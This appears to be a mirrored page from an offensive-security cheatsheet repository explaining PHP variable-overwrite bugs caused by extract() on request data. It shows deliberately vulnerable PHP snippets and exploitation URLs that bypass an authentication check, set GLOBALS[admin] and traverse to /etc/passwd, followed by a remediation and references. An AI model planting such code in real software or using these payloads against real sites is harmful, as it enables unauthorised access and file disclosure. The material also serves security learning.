daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (4043B)


      1 ---
      2 title: "External Variable Modification"
      3 topic: "External Variable Modification"
      4 topicSlug: "external-variable-modification"
      5 sourcePath: "External Variable Modification/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/External%20Variable%20Modification/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # External Variable Modification
     12 
     13 > External Variable Modification Vulnerability occurs when a web application improperly handles user input, allowing attackers to overwrite internal variables. In PHP, functions like extract($_GET), extract($_POST), or import_request_variables() can be abused if they import user-controlled data into the global scope without proper validation. This can lead to security issues such as unauthorized changes to application logic, privilege escalation, or bypassing security controls.
     14 
     15 ## Summary
     16 
     17 * [Methodology](#methodology)
     18     * [Overwriting Critical Variables](#overwriting-critical-variables)
     19     * [Poisoning File Inclusion](#poisoning-file-inclusion)
     20     * [Global Variable Injection](#global-variable-injection)
     21 * [Remediations](#remediations)
     22 * [References](#references)
     23 
     24 ## Methodology
     25 
     26 The `extract()` function in PHP imports variables from an array into the current symbol table. While it may seem convenient, it can introduce serious security risks, especially when handling user-supplied data.
     27 
     28 * It allows overwriting existing variables.
     29 * It can lead to **variable pollution**, impacting security mechanisms.
     30 * It can be used as a **gadget** to trigger other vulnerabilities like Remote Code Execution (RCE) and Local File Inclusion (LFI).
     31 
     32 By default, `extract()` uses `EXTR_OVERWRITE`, meaning it **replaces existing variables** if they share the same name as keys in the input array.
     33 
     34 ### Overwriting Critical Variables
     35 
     36 If `extract()` is used in a script that relies on specific variables, an attacker can manipulate them.
     37 
     38 ```php
     39 <?php
     40     $authenticated = false;
     41     extract($_GET);
     42     if ($authenticated) {
     43         echo "Access granted!";
     44     } else {
     45         echo "Access denied!";
     46     }
     47 ?>
     48 ```
     49 
     50 **Exploitation:**
     51 
     52 In this example, the use of `extract($_GET)` allow an attacker to set the `$authenticated` variable to `true`:
     53 
     54 ```ps1
     55 http://example.com/vuln.php?authenticated=true
     56 http://example.com/vuln.php?authenticated=1
     57 ```
     58 
     59 ### Poisoning File Inclusion
     60 
     61 If `extract()` is combined with file inclusion, attackers can control file paths.
     62 
     63 ```php
     64 <?php
     65     $page = "config.php";
     66     extract($_GET);
     67     include "$page";
     68 ?>
     69 ```
     70 
     71 **Exploitation:**
     72 
     73 ```ps1
     74 http://example.com/vuln.php?page=../../etc/passwd
     75 ```
     76 
     77 ### Global Variable Injection
     78 
     79 :warning: As of PHP 8.1.0, write access to the entire `$GLOBALS` array is no longer supported.
     80 
     81 Overwriting `$GLOBALS` when an application calls `extract` function on untrusted value:
     82 
     83 ```php
     84 extract($_GET);
     85 ```
     86 
     87 An attacker can manipulate **global variables**:
     88 
     89 ```ps1
     90 http://example.com/vuln.php?GLOBALS[admin]=1
     91 ```
     92 
     93 ## Remediations
     94 
     95 Use `EXTR_SKIP` to prevent overwriting:
     96 
     97 ```php
     98 extract($_GET, EXTR_SKIP);
     99 ```
    100 
    101 ## References
    102 
    103 * [CWE-473: PHP External Variable Modification - Common Weakness Enumeration - November 19, 2024](https://web.archive.org/web/20260210044429/https://cwe.mitre.org/data/definitions/473.html)
    104 * [CWE-621: Variable Extraction Error - Common Weakness Enumeration - November 19, 2024](https://web.archive.org/web/20260223131419/https://cwe.mitre.org/data/definitions/621.html)
    105 * [Function extract - PHP Documentation - March 21, 2001](https://web.archive.org/web/20260210044429/https://www.php.net/manual/en/function.extract.php)
    106 * [$GLOBALS variables - PHP Documentation - April 30, 2008](https://web.archive.org/web/20260307071107/https://www.php.net/manual/en/reserved.variables.globals.php)
    107 * [The Ducks - HackThisSite - December 14, 2016](https://github.com/HackThisSite/CTF-Writeups/blob/master/2016/SCTF/Ducks/README.md)
    108 * [Extracttheflag! - Orel / WindTeam - February 28, 2024](https://web.archive.org/web/20250709004721/https://ctftime.org/writeup/38076)